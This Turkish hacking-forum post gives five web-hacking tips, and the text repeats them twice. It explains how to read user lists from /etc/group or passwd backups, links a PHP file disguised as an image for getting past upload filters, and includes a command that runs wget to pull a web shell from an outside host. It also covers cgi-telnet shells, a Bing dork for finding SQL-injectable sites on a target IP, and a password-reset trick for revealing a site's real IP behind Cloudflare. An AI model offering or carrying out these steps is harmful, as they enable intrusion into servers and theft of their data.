Aklıma gelen 5 bilgiyi sizinle paylaşmak istedim bilenleriniz vardır belki ama yapacak birşey yok web hacking ile ilgili çok ta bilgili değilsen bu bilgiler günü gelince çok işine yarayabilir
1- Bazı sunucularda cat / etc / passwd yaptığınızda bazen etc de passwd bölümüne chmod vermiş olabilirler yani okuyamazsınız ancak /etc / group/ ve / tmp / passwd.bak bölümlerinde de userleri bulabilirsiniz
(cat / etc / group & cat / tmp / passwd.bak)
2- Ninja methodunda kullanılan .php dosyası .php yemeyen upload buttonlarına bile .php yedirebildiği biliniyor buyrun size hazır editlenmiş ninja methodu .php'si .jpg'ye dönüşünce resim .php olunca shell olabiliyor
http://s6.dosya.tc/server9/p8mgd3/worthless.rar.html
bu .php server'e resimmiş gibi gözüküp girebiliyor girdikten sonra da worthless.php?cmd=wget http://site.com/shell.txt -O isim.php yaparak shell çağırabilirsiniz.
3- c1.tar.gz dosyasını açtığınızda www.site.com/c1/ klasörüne girdiğinizde içi boş gözükebilir ancak aslında doludur.C1 içindeki dosyaları görüntülemek için cgi-telnet kullanmanız gerekir..Bu shell size yardımcı olur hiçbir yere tıklamadan dırek c1 klasörüne girerek dosyalara ulaşabilirsiniz,aynı zamanda bu shell ln / cat fonksiyonlarını da bypass eder
http://www.spyhackerz.com/forum/threads/ln-cat-bypass-cgi-shell.8039/
4-Hedef sitemizin sunucusunda basit bir sql taraması yapmak için
bing.com a girip "ip:siteninipsi .php?id=" yazarak sql li siteler bulabilirsiniz.
örnek:
https://www.bing.com/search?q=ip:83.66.2.86+.php?id=&PC=U316&FORM=CHROMN
5-Cloudflare bypasslamak için
*hedef sıteye kayıt olun
*şifremi unuttum deyin ve yeni şifre isteyin
*mail kutunuzu açın yeni şifreyle ilgili gelen mesajın ip'sine bakın sitenin cloudflaresiz ip'si karşınızda.
View hidden content is available for registered users!
1- Bazı sunucularda cat / etc / passwd yaptığınızda bazen etc de passwd bölümüne chmod vermiş olabilirler yani okuyamazsınız ancak /etc / group/ ve / tmp / passwd.bak bölümlerinde de userleri bulabilirsiniz
(cat / etc / group & cat / tmp / passwd.bak)
2- Ninja methodunda kullanılan .php dosyası .php yemeyen upload buttonlarına bile .php yedirebildiği biliniyor buyrun size hazır editlenmiş ninja methodu .php'si .jpg'ye dönüşünce resim .php olunca shell olabiliyor
http://s6.dosya.tc/server9/p8mgd3/worthless.rar.html
bu .php server'e resimmiş gibi gözüküp girebiliyor girdikten sonra da worthless.php?cmd=wget http://site.com/shell.txt -O isim.php yaparak shell çağırabilirsiniz.
3- c1.tar.gz dosyasını açtığınızda www.site.com/c1/ klasörüne girdiğinizde içi boş gözükebilir ancak aslında doludur.C1 içindeki dosyaları görüntülemek için cgi-telnet kullanmanız gerekir..Bu shell size yardımcı olur hiçbir yere tıklamadan dırek c1 klasörüne girerek dosyalara ulaşabilirsiniz,aynı zamanda bu shell ln / cat fonksiyonlarını da bypass eder
http://www.spyhackerz.com/forum/threads/ln-cat-bypass-cgi-shell.8039/
4-Hedef sitemizin sunucusunda basit bir sql taraması yapmak için
bing.com a girip "ip:siteninipsi .php?id=" yazarak sql li siteler bulabilirsiniz.
örnek:
https://www.bing.com/search?q=ip:83.66.2.86+.php?id=&PC=U316&FORM=CHROMN
5-Cloudflare bypasslamak için
*hedef sıteye kayıt olun
*şifremi unuttum deyin ve yeni şifre isteyin
*mail kutunuzu açın yeni şifreyle ilgili gelen mesajın ip'sine bakın sitenin cloudflaresiz ip'si karşınızda.